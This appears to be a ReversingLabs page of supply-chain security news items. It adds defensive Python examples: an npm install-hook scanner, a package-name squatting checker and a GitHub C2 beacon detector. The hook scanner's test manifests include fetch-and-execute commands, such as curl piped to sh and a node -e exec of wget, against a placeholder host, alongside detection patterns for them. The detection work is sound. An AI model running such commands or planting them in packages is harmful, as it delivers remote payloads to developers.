Reversing Labs

Compromised ultralytics PyPI package delivers crypto coinminer

On December 4, a malicious version 8.3.41 of the popular AI library ultralytics — which has almost 60 million downloads — was published to the Python Package Index (PyPI) package repository.

Fake Recruiter Coding Tests Target Developers With Malicious Python Packages

The Lazarus Group has been targeting developers in a new VMConnect campaign, using fake job interviews to trick them into downloading malicious software packages from open-source repositories.

Report: 95% of Organizations Face Severe Software Supply Chain Risk

OSC&R report reveals that 95% of organizations face high software supply chain risks. Despite advancements in application security programs, more work is needed to manage those risks effectively.

Malicious NuGet Campaign Uses Homoglyphs and IL Weaving to Fool Devs

This new set of packages, consisting of approximately 60 packages and 290 versions, showcases a more sophisticated approach compared to earlier attacks revealed in October 2023, according to ReversingLabs.

Malicious NPM Package Targets AWS Users to Deploy Backdoor

ReversingLabs researchers discovered a suspicious package on npm called legacyreact-aws-s3-typescript. They found that the package contained a post-install script that downloaded and executed a simple backdoor.
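Because npm runs the preinstall, install, postinstall and prepare hooks automatically during `npm install`, a package's install script runs before any of its code is imported. The scanner below is an added example (not ReversingLabs' tooling or the package described above): it reads package.json manifests and grades install-time hooks, treating a remote fetch combined with a pipe-to-shell or inline `node -e` as high severity. The manifests are constructed and the package names are invented; `example.invalid` is a reserved placeholder domain.

```python
"""Grade npm lifecycle hooks that could fetch and run code at install time.

Added example, not code from the page. The manifests below are constructed
and use invented package names.
"""
import re

# Hooks npm executes automatically during `npm install`.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Crude but useful heuristics: a downloader and a way to execute what it got.
FETCH_RE = re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b", re.I)
EXEC_RE = re.compile(
    r"(\|\s*(sh|bash)\b|\bnode\s+-e\b|\beval\b|\bchmod\s+\+x\b)", re.I
)
SEVERITY_ORDER = {"low": 0, "medium": 1, "high": 2}

# Constructed manifests: one clean, one legitimate native build, two malicious.
MANIFESTS = [
    {"name": "benign-lib", "version": "1.0.0",
     "scripts": {"test": "jest", "build": "tsc"}},
    {"name": "native-addon", "version": "2.1.0",
     "scripts": {"install": "node-gyp rebuild"}},
    {"name": "evil-pkg", "version": "1.0.3",
     "scripts": {"postinstall": "curl -s https://example.invalid/x.sh | sh"}},
    {"name": "sneaky-pkg", "version": "0.0.1",
     "scripts": {"preinstall":
                 "node -e \"require('child_process').exec("
                 "'wget https://example.invalid/a -O /tmp/a')\""}},
]


def classify(command: str) -> str:
    """high = fetch and execute, medium = one of the two, low = hook present."""
    fetch = bool(FETCH_RE.search(command))
    execute = bool(EXEC_RE.search(command))
    if fetch and execute:
        return "high"
    if fetch or execute:
        return "medium"
    return "low"


def hook_findings(manifest: dict) -> list:
    """Return (hook, command, severity) for every install-time hook."""
    scripts = manifest.get("scripts") or {}
    return [(hook, cmd, classify(cmd))
            for hook, cmd in scripts.items() if hook in LIFECYCLE_HOOKS]


def scan_manifests(manifests: list) -> dict:
    """Map package name -> worst severity among its install-time hooks.
    Packages without such hooks are omitted."""
    report = {}
    for m in manifests:
        findings = hook_findings(m)
        if findings:
            report[m["name"]] = max((f[2] for f in findings),
                                    key=SEVERITY_ORDER.__getitem__)
    return report


if __name__ == "__main__":
    for name, severity in scan_manifests(MANIFESTS).items():
        print(f"{severity:6} {name}")
```

A "low" hit such as `node-gyp rebuild` is normal for native addons, so the grading is a triage aid, not a verdict. In CI, `npm ci --ignore-scripts` disables these hooks entirely; packages that genuinely need them can then be allow-listed.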

Python Downloader Highlights Noise Problem in Open Source Threat Detection

This incident sheds light on the challenge of tracking and mitigating open-source threats, specifically the issue of "noise" in the form of low-quality test packages and low-distribution malicious packages.

Why Shareable SBOMs are Essential for Software Security

Development teams need to plan ahead and create shareable SBOMs that are standardized in a format that's readily consumable while also establishing scalable systems for attestation, access management, and data verification, among other factors.

Malicious PyPI Packages Target Crypto Wallet Recovery Passwords in BIPClip Campaign

The malicious packages used name squatting, disguised dependencies, and legitimate-looking code to steal mnemonic phrases, evading detection and targeting crypto assets without broader system compromise.
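Name squatting (the BIPClip campaign above) and homoglyph names (the NuGet campaign further up the page) both rely on a name that a human reads as the legitimate one. The checker below is an added example, not code from either report: it canonicalises a candidate name using PyPI's PEP 503 normalisation plus a small, constructed table of Cyrillic-to-Latin confusables, then flags names that collide after canonicalisation, sit within one edit of a popular name, or embed a popular name. The "popular" list is constructed; the assumption that `react-aws-s3-typescript` is the legitimate target of `legacyreact-aws-s3-typescript` is mine.

```python
"""Flag package names that squat on or visually mimic popular ones.

Added example; the POPULAR list and CONFUSABLES table are constructed
subsets, not the real registries or the Unicode confusables data.
"""
import re
import unicodedata

POPULAR = ["requests", "bip-utils", "mnemonic", "react-aws-s3-typescript"]

# Cyrillic letters that render identically to Latin ones (constructed subset).
CONFUSABLES = {"\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p",
               "\u0441": "c", "\u0445": "x", "\u0443": "y", "\u0456": "i"}


def pep503(name: str) -> str:
    """PyPI project-name normalisation: runs of -, _ and . become '-'; lowercase."""
    return re.sub(r"[-_.]+", "-", name).lower()


def canonical(name: str) -> str:
    """PEP 503 normalisation after NFKC and confusable folding."""
    name = unicodedata.normalize("NFKC", name)
    return pep503("".join(CONFUSABLES.get(ch, ch) for ch in name))


def levenshtein(a: str, b: str) -> int:
    """Plain edit distance (insert, delete, substitute)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1,
                           prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def squat_candidates(name: str, popular=POPULAR, max_distance: int = 1) -> list:
    """Return (popular_name, reason) pairs for which `name` looks like a squat."""
    hits = []
    c = canonical(name)
    for p in popular:
        if pep503(name) == pep503(p):
            continue  # same project under PyPI's own normalisation
        cp = canonical(p)
        if cp == c:
            hits.append((p, "homoglyph or normalisation collision"))
        elif levenshtein(c, cp) <= max_distance:
            hits.append((p, f"edit distance {levenshtein(c, cp)}"))
        elif cp in c and len(c) - len(cp) <= 8:
            hits.append((p, "embeds popular name"))
    return hits


if __name__ == "__main__":
    for candidate in ["requ\u0435sts", "reqests", "legacyreact-aws-s3-typescript",
                      "Requests"]:
        print(candidate, squat_candidates(candidate))
```

The `pep503` short-circuit matters: `Requests` and `requests` are the same PyPI project, not a squat, whereas `requ\u0435sts` with a Cyrillic e only collides after confusable folding. A production check would use the full Unicode confusables table and the registry's actual popularity data.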

GitGot: GitHub Leveraged by Cybercriminals to Store Stolen Data

It appears that the package author was in the process of building out the malware and adding layers of deception. Fortunately, the package was detected and removed from npm before that could happen.

Malware Leveraging Public Infrastructure Like GitHub on the Rise

Public services like GitHub provide a convenient and less suspicious platform for malware authors to operate their C2 infrastructure, eliminating the need for maintaining their own servers.
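Because traffic to GitHub blends in, a domain block-list does not help; what distinguishes a C2 poll from a developer's `git fetch` is the pattern. The script below is an added example (not code from the page): it parses constructed proxy log lines, groups requests to GitHub-hosted endpoints by source host, process and URL, and flags groups whose inter-request intervals are regular (low coefficient of variation), which is the signature of a beacon. The log format, host names and URLs are invented.

```python
"""Detect periodic polling of GitHub-hosted content in proxy logs.

Added example; SAMPLE_LOG is constructed and its format is invented.
"""
import re
import statistics
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlparse

LINE_RE = re.compile(
    r"^(?P<ts>\S+) host=(?P<host>\S+) proc=(?P<proc>\S+) "
    r"(?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3})$"
)
# GitHub endpoints commonly used to serve files or gists.
GITHUB_HOSTS = {"github.com", "api.github.com", "raw.githubusercontent.com",
                "gist.githubusercontent.com", "objects.githubusercontent.com"}

# Constructed log: ws-17 polls one raw file every 60 s; ws-03 is a developer.
SAMPLE_LOG = """
2024-06-01T10:00:00 host=ws-17 proc=python.exe GET https://raw.githubusercontent.com/u/r/main/cmd.txt 200
2024-06-01T10:00:05 host=ws-03 proc=git.exe GET https://api.github.com/repos/u/r 200
2024-06-01T10:01:00 host=ws-17 proc=python.exe GET https://raw.githubusercontent.com/u/r/main/cmd.txt 304
2024-06-01T10:02:00 host=ws-17 proc=python.exe GET https://raw.githubusercontent.com/u/r/main/cmd.txt 304
2024-06-01T10:03:00 host=ws-17 proc=python.exe GET https://raw.githubusercontent.com/u/r/main/cmd.txt 200
2024-06-01T10:04:00 host=ws-17 proc=python.exe GET https://raw.githubusercontent.com/u/r/main/cmd.txt 304
2024-06-01T10:07:40 host=ws-03 proc=git.exe GET https://api.github.com/repos/u/r 200
2024-06-01T10:21:12 host=ws-03 proc=git.exe GET https://api.github.com/repos/u/r 200
2024-06-01T10:22:00 host=ws-03 proc=git.exe GET https://api.github.com/repos/u/r 200
2024-06-01T10:30:00 host=ws-03 proc=chrome.exe GET https://github.com/u/r/pulls 200
"""


def parse(log: str) -> list:
    """Turn log lines into dicts; lines that do not match are skipped."""
    events = []
    for line in log.strip().splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["ts"] = datetime.fromisoformat(e["ts"])
        e["domain"] = urlparse(e["url"]).hostname
        events.append(e)
    return events


def find_beacons(events: list, min_hits: int = 4, max_cv: float = 0.2) -> list:
    """Flag (host, proc, url) groups hitting GitHub at near-constant intervals."""
    groups = defaultdict(list)
    for e in events:
        if e["domain"] in GITHUB_HOSTS:
            groups[(e["host"], e["proc"], e["url"])].append(e["ts"])
    beacons = []
    for (host, proc, url), times in groups.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue
        cv = statistics.pstdev(gaps) / mean  # 0 means perfectly regular
        if cv <= max_cv:
            beacons.append({"host": host, "proc": proc, "url": url,
                            "hits": len(times), "period_s": round(mean),
                            "cv": round(cv, 3)})
    return beacons


if __name__ == "__main__":
    for b in find_beacons(parse(SAMPLE_LOG)):
        print(b)
```

Updaters and package managers also poll GitHub on a schedule, so a hit is a lead to correlate with the process, the user and what the fetched file contains, not a verdict on its own; a real implementation would also add jitter tolerance, since mature implants randomise their sleep.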
